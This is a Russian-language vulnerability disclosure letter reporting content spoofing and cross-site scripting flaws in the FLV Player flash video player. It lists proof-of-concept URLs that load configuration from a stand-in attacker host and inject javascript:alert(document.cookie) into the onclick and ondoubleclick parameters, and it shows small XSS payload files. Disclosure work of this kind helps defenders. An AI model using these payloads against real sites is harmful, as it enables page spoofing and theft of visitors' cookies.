Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Content Spoofing и Cross-Site Scripting уязвимостях в флеш видео плеере FLV Player.
Content Spoofing (WASC-12):
Флешки плеера FLV Player принимают произвольные адреса в параметре configxml, что позволяет подделать содержимое флешки - например, указав адрес с файлом конфигурации с другого сайта.
http://site/player_flv.swf?configxml=http://attacker/1.xml
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml
Флешки плеера FLV Player принимают произвольные адреса в параметре config, что позволяет подделать содержимое флешки - например, указав адрес с файлом конфигурации с другого сайта.
http://site/player_flv.swf?config=http://attacker/1.txt
http://site/player_flv_maxi.swf?config=http://attacker/1.txt
http://site/player_flv_multi.swf?config=http://attacker/1.txt
Флешки плеера FLV Player позволяют подделать все важные параметры, в том числе flv и startimage, и при этом принимают произвольные адреса в параметрах flv и startimage, что позволяет подделать содержимое флешки - например, указав адреса видео и изображения с другого сайта. А для указания ссылки на произвольный сайт можно использовать параметры onclick и ondoubleclick.
http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_mini.swf?flv=http://attacker/1.flv
XSS (WASC-08):
http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(documentcookie)
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml
Файл xss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>
http://site/player_flv_maxi.swf?config=http://attacker/xss.txt
http://site/player_flv_multi.swf?config=http://attacker/xss.txt
Файл xss.txt:
onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)
Уязвимы версии MINI, NORMAL, MAXI и MULTI плеера. Замечу, что версия NORMAL встречается под именами player_flv.swf и player_flv_classic.swf.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/5098/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua